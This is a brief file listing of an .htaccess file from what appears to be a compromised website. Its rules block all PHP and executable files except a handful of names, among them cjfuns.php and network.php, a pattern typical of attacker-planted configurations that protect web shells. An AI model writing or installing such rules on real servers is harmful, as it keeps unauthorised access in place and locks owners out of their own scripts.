• File: .htaccess
  • Full Path: /home/albatroz/gomes-mota.pt/compiled-engine/.htaccess
  • Date Modified: 06/11/2026 12:34 AM
  • File size: 232 bytes
  • MIME-type: text/plain; charset=us-ascii
  • Charset: utf-8
<FilesMatch "\.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|profile.php|admin.php|cjfuns.php|network.php)$">
Allow from all
</FilesMatch>